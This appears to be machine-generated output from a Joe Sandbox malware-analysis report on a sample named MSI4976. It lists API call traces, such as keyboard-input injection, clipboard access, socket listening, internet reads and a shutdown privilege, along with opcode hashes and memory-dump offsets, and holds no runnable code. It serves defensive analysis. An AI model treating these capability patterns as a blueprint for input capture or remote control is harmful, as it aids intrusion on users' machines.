                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                         • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
                                        • String ID: \*.*
                                        • API String ID: 2643075503-1173974218
                                        • Opcode ID: 2d63cb01f6baaa611831e3950f429881435efcc5a9201897da430640c7804e48
                                        • Instruction ID: ae26a58a43db22c1c7ee487d28f309580b04da532338fa29214990f48c878ca4
                                        • Opcode Fuzzy Hash: 2d63cb01f6baaa611831e3950f429881435efcc5a9201897da430640c7804e48
                                        • Instruction Fuzzy Hash: 5E21C172408344AAC612EBA0D8859DBBBDCAF99354F448E1AF5D5C7042EB31E64D87A2
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                         • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                        • String ID:
                                        • API String ID: 1737998785-0
                                        • Opcode ID: 97a8c810ec6a0cfff13533146d5e029576a0c1ce998f9ec01f7487a66266c399
                                        • Instruction ID: 65cc95186e040cb49ea7511ca67654a138392d02f722d734071f35f0caf59d99
                                        • Opcode Fuzzy Hash: 97a8c810ec6a0cfff13533146d5e029576a0c1ce998f9ec01f7487a66266c399
                                        • Instruction Fuzzy Hash: 09219F35704210AFEB22AF24DC59B6E7BACEF45710F00801AF94A9B2A1DB35ED419B90
                                        APIs
                                          • Part of subcall function 0033AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0033AF8E
                                          • Part of subcall function 0033B736: GetCursorPos.USER32(000000FF), ref: 0033B749
                                          • Part of subcall function 0033B736: ScreenToClient.USER32(00000000,000000FF), ref: 0033B766
                                          • Part of subcall function 0033B736: GetAsyncKeyState.USER32(00000001), ref: 0033B78B
                                          • Part of subcall function 0033B736: GetAsyncKeyState.USER32(00000002), ref: 0033B799
                                        • ReleaseCapture.USER32 ref: 0038EB1A
                                        • SetWindowTextW.USER32(?,00000000), ref: 0038EBC2
                                        • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0038EBD5
                                        • NtdllDialogWndProc_W.NTDLL(?,00000202,?,?,00000000,00000001,?,?,?), ref: 0038ECAE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                         • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: AsyncStateWindow$CaptureClientCursorDialogLongMessageNtdllProc_ReleaseScreenSendText
                                        • String ID: @GUI_DRAGFILE$@GUI_DROPID$@U=u
                                        • API String ID: 973565025-2104563098
                                        • Opcode ID: 5e0ab06a0b0e44988384438671eb1efbad4a1e9916a192f6433f98e8474eb5fe
                                        • Instruction ID: 99a5553c057c29192b62ebb5b3aa7253e23133b512866d4e45ef90391baf6eb5
                                        • Opcode Fuzzy Hash: 5e0ab06a0b0e44988384438671eb1efbad4a1e9916a192f6433f98e8474eb5fe
                                        • Instruction Fuzzy Hash: 4751AD31604344AFD716EF24DC96FAA7BE9FB88700F404A2DF5869B2E1DB709904CB52
                                        APIs
                                          • Part of subcall function 0032CAEE: _memmove.LIBCMT ref: 0032CB2F
                                        • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 003724F6
                                        • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00372526
                                        • _wcscmp.LIBCMT ref: 0037253A
                                        • _wcscmp.LIBCMT ref: 00372555
                                        • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 003725F3
                                        • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00372609
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                         • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                        • String ID: *.*
                                        • API String ID: 713712311-438819550
                                        • Opcode ID: 2da887d27cb4dfd5b49d5433dfa3532642417badcd3b1b2d7a360c223a708a25
                                        • Instruction ID: 86a01c958be35f5d4e080e5267b434deafa50f6c6c422e9f0207b5962e9f4738
                                        • Opcode Fuzzy Hash: 2da887d27cb4dfd5b49d5433dfa3532642417badcd3b1b2d7a360c223a708a25
                                        • Instruction Fuzzy Hash: 10416F7190021AAFCF26DFA4DC55AEFBBB8FF06310F104456E419AA191E7749B84CB90
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                         • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: _memmove
                                        • String ID:
                                        • API String ID: 4104443479-0
                                        • Opcode ID: 7181a145067972f235a1300dc5cad1d812818288df9fbf399eff3a769c029ebe
                                        • Instruction ID: 8d3e30ac73300fc866b98376d07500ecdb6b7d609a5b278226864a8ce4de2ce3
                                        • Opcode Fuzzy Hash: 7181a145067972f235a1300dc5cad1d812818288df9fbf399eff3a769c029ebe
                                        • Instruction Fuzzy Hash: 5F12A270A01619EFDF06DFA8E981AAEB3F5FF48300F204569E406EB250EB35AD51CB50
                                        APIs
                                          • Part of subcall function 0035BEC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0035BF0F
                                          • Part of subcall function 0035BEC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0035BF3C
                                          • Part of subcall function 0035BEC3: GetLastError.KERNEL32 ref: 0035BF49
                                        • ExitWindowsEx.USER32(?,00000000), ref: 0036830C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                         • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                        • String ID: $@$SeShutdownPrivilege
                                        • API String ID: 2234035333-194228
                                        • Opcode ID: 2eb3ba43bc5c2a13605c65bf4e08673e6a2d0d7b88ba4f282fb9dc31a691e4c2
                                        • Instruction ID: fad8c7006cf39ac34440aa5ac3b649250a57980af3571ba16deabd73a1645bdb
                                        • Opcode Fuzzy Hash: 2eb3ba43bc5c2a13605c65bf4e08673e6a2d0d7b88ba4f282fb9dc31a691e4c2
                                        • Instruction Fuzzy Hash: 7701F77DA40311ABE76B17788C4BFBB765C9B09B80F398A24F943E52D5DE609C0082A4
                                        APIs
                                        • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00379235
                                        • WSAGetLastError.WS2_32(00000000), ref: 00379244
                                        • bind.WS2_32(00000000,?,00000010), ref: 00379260
                                        • listen.WS2_32(00000000,00000005), ref: 0037926F
                                        • WSAGetLastError.WS2_32(00000000), ref: 00379289
                                        • closesocket.WS2_32(00000000), ref: 0037929D
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                         • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: ErrorLast$bindclosesocketlistensocket
                                        • String ID:
                                        • API String ID: 1279440585-0
                                        • Opcode ID: f7c009a1be7db86e87ccfb9d2ea76aadd2c38c7626d3c63580822f3e3cb7dcb6
                                        • Instruction ID: b34416110f69edf41f5620d16318001183232655829fde994d85dda25062eaeb
                                        • Opcode Fuzzy Hash: f7c009a1be7db86e87ccfb9d2ea76aadd2c38c7626d3c63580822f3e3cb7dcb6
                                        • Instruction Fuzzy Hash: 1421E131600604AFCB16FF64CC85B6EB7ACEF49320F118659F95AAB392CB34AD41CB51
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                         • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: _memmove
                                        • String ID: hN=$tM=
                                        • API String ID: 4104443479-683757419
                                        • Opcode ID: e3a68f220096e92c97c2e4e051bd0305f795bdfceaf25e49cb1fff0bddf00461
                                        • Instruction ID: fa70e5300ac5714d84da21c3117f01bc5bbfde49ebc90b7c722aa216531bddc0
                                        • Opcode Fuzzy Hash: e3a68f220096e92c97c2e4e051bd0305f795bdfceaf25e49cb1fff0bddf00461
                                        • Instruction Fuzzy Hash: 2BA27E75D00229CFCB26CF58D4816ADBBB5FF49314F2681AAE859AB390D7349D81CF90
                                        APIs
                                          • Part of subcall function 0034010A: std::exception::exception.LIBCMT ref: 0034013E
                                          • Part of subcall function 0034010A: __CxxThrowException@8.LIBCMT ref: 00340153
                                        • _memmove.LIBCMT ref: 00393020
                                        • _memmove.LIBCMT ref: 00393135
                                        • _memmove.LIBCMT ref: 003931DC
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                         • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: _memmove$Exception@8Throwstd::exception::exception
                                        • String ID:
                                        • API String ID: 1300846289-0
                                        • Opcode ID: 5ff8258a5047a82be8774a68506e2bd1d9dfa7834aa6c9c0a7ea4a655c483232
                                        • Instruction ID: 27b94f1d91c9f2993a34e8d07fd3169c627925478e1c8deefdd0ce2f5a02dc1e
                                        • Opcode Fuzzy Hash: 5ff8258a5047a82be8774a68506e2bd1d9dfa7834aa6c9c0a7ea4a655c483232
                                        • Instruction Fuzzy Hash: 6102A0B0A00215DFCF06DF68D981AAEB7F9EF48300F158469E806DF255EB35DA51CB91
                                        APIs
                                          • Part of subcall function 0037ACD3: inet_addr.WS2_32(00000000), ref: 0037ACF5
                                        • socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 0037973D
                                        • WSAGetLastError.WS2_32(00000000,00000000), ref: 00379760
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                         • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: ErrorLastinet_addrsocket
                                        • String ID:
                                        APIs
                                        • FindFirstFileW.KERNEL32(?,?), ref: 0036F37A
                                        • _wcscmp.LIBCMT ref: 0036F3AA
                                        • _wcscmp.LIBCMT ref: 0036F3BF
                                        • FindNextFileW.KERNEL32(00000000,?), ref: 0036F3D0
                                        • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0036F3FE
                                        Similarity
                                        • API ID: Find$File_wcscmp$CloseFirstNext
                                        • String ID:
                                        APIs
                                        • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 0036439C
                                        • SetKeyboardState.USER32(00000080,?,00000001), ref: 003643B8
                                        • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 00364425
                                        • SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 00364483
                                        Similarity
                                        • API ID: KeyboardState$InputMessagePostSend
                                        • String ID:
                                        APIs
                                          • Part of subcall function 0033AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0033AF8E
                                        • GetCursorPos.USER32(?), ref: 0038EFE2
                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0039F3C3,?,?,?,?,?), ref: 0038EFF7
                                        • GetCursorPos.USER32(?), ref: 0038F041
                                        • NtdllDialogWndProc_W.NTDLL(?,0000007B,?,?,?,?,?,?,?,?,?,?,0039F3C3,?,?,?), ref: 0038F077
                                        Similarity
                                        • API ID: Cursor$DialogLongMenuNtdllPopupProc_TrackWindow
                                        • String ID:
                                        APIs
                                          • Part of subcall function 0033AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0033AF8E
                                        • NtdllDialogWndProc_W.NTDLL(?,0000002B,?,?,?,?,?,?,?,0039F352,?,?,?), ref: 0038F115
                                          • Part of subcall function 0033B155: GetWindowLongW.USER32(?,000000EB), ref: 0033B166
                                        • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 0038F0FB
                                        Similarity
                                        • API ID: LongWindow$DialogMessageNtdllProc_Send
                                        • String ID: @U=u
                                        APIs
                                        • lstrlenW.KERNEL32(?,?,?,00000000), ref: 0036221E
                                        Similarity
                                        • API ID: lstrlen
                                        • String ID: ($|
                                        APIs
                                          • Part of subcall function 0033AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0033AF8E
                                        • NtdllDialogWndProc_W.NTDLL(?,?,?,?,?), ref: 0033AE5E
                                        Similarity
                                        • API ID: DialogLongNtdllProc_Window
                                        • String ID:
                                        APIs
                                        • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00374A1E,00000000), ref: 003755FD
                                        • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00375629
                                        Similarity
                                        • API ID: Internet$AvailableDataFileQueryRead
                                        • String ID:
                                        APIs
                                        • SetErrorMode.KERNEL32(00000001), ref: 0036EA95
                                        • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0036EAEF
                                        • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0036EB3C
                                        Similarity
                                        • API ID: ErrorMode$DiskFreeSpace
                                        • String ID:
                                        APIs
                                        • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0036704C
                                        • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 0036708D
                                        • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00367098
                                        Similarity
                                        • API ID: CloseControlCreateDeviceFileHandle
                                        • String ID:
                                        APIs
                                          • Part of subcall function 0033AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0033AF8E
                                          • Part of subcall function 0033B155: GetWindowLongW.USER32(?,000000EB), ref: 0033B166
                                        • GetParent.USER32(?), ref: 0039F4B5
                                        • NtdllDialogWndProc_W.NTDLL(?,00000133,?,?,?,?,?,?,?,?,0033ADDD,?,?,?,00000006,?), ref: 0039F52F
                                        Similarity
                                        • API ID: LongWindow$DialogNtdllParentProc_
                                        • String ID:
                                        APIs
                                        • ClientToScreen.USER32(?,?), ref: 0038F47D
                                        • NtdllDialogWndProc_W.NTDLL(?,00000200,?,?,?,?,?,?,?,0039F42E,?,?,?,?,?), ref: 0038F4A6
                                        Similarity
                                        • API ID: ClientDialogNtdllProc_Screen
                                        • String ID:
                                        APIs
                                        • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,0037C2E2,?,?,00000000,?), ref: 0036D73F
                                        • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,0037C2E2,?,?,00000000,?), ref: 0036D751
                                        Similarity
                                        • API ID: ErrorFormatLastMessage
                                        • String ID:
                                        APIs
                                        • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00364B89
                                        • keybd_event.USER32(?,753DC0D0,?,00000000), ref: 00364B9C
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: InputSendkeybd_event
                                        • String ID:
                                        • API String ID: 3536248340-0
                                        • Opcode ID: f6ae49066469b93925d7511582142c36bb698f95ab4a434f7cbdb4f012968382
                                        • Instruction ID: 863dd2161314d48b93a3da30aa60a9fb730622f578751e1fd370a6eb5535299a
                                        • Opcode Fuzzy Hash: f6ae49066469b93925d7511582142c36bb698f95ab4a434f7cbdb4f012968382
                                        • Instruction Fuzzy Hash: 8AF01D7090424DAFDB068FA5C805BBE7FB8EF05305F04C409F995A6191D779C6159F94
                                        APIs
                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000), ref: 0035B8C5
                                        • CloseHandle.KERNEL32(?), ref: 0035B8D7
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: AdjustCloseHandlePrivilegesToken
                                        • String ID:
                                        • API String ID: 81990902-0
                                        • Opcode ID: d50a90d278768705be49a3476b2905d445f42d9fdf0ce22b03fc44f216a6437c
                                        • Instruction ID: b7d87d6b8afac72537fcd20cc4a1570ac397fa54e418011ee74967d3b497252e
                                        • Opcode Fuzzy Hash: d50a90d278768705be49a3476b2905d445f42d9fdf0ce22b03fc44f216a6437c
                                        • Instruction Fuzzy Hash: A6E0E676004511AFE7272B50EC45D77B7EDEF05311B118419F55689870D7716CD1DB10
                                        APIs
                                        • GetWindowLongW.USER32(?,000000EC), ref: 0038F59C
                                        • NtdllDialogWndProc_W.NTDLL(?,00000084,00000000,?,?,0039F3AD,?,?,?,?), ref: 0038F5C6
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: DialogLongNtdllProc_Window
                                        • String ID:
                                        • API String ID: 2065330234-0
                                        • Opcode ID: 684dd92d136c4c58934d2db48172bc445a19834ea53db3907b18e5f48d1e6404
                                        • Instruction ID: 434908dfa07cc5fb921fe2ab2bd966e50fb7dd1572e829088e8347af246c6456
                                        • Opcode Fuzzy Hash: 684dd92d136c4c58934d2db48172bc445a19834ea53db3907b18e5f48d1e6404
                                        • Instruction Fuzzy Hash: 77E08C70104218BBEB161F09DC1AFB93B58EB02B50F108626F917C84E0D7B089A0D760
                                        APIs
                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,0032125D,00347A43,00320F35,?,?,00000001), ref: 00348E41
                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00348E4A
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: ExceptionFilterUnhandled
                                        • String ID:
                                        • API String ID: 3192549508-0
                                        • Opcode ID: b1002036e4d9c8faa931733208a05cfbda7f5a000bf86d44d160587c2cf04d8d
                                        • Instruction ID: 96342b671dda3b1a0cb2541a55c53f9076dc01b4bc2c7ad296cf2871e0caca9e
                                        • Opcode Fuzzy Hash: b1002036e4d9c8faa931733208a05cfbda7f5a000bf86d44d160587c2cf04d8d
                                        • Instruction Fuzzy Hash: DBB09275044A08ABEE026BA1EC09B883F6CEB0BB62F004010F61E448A08BA354508E92
                                        Memory Dump Source
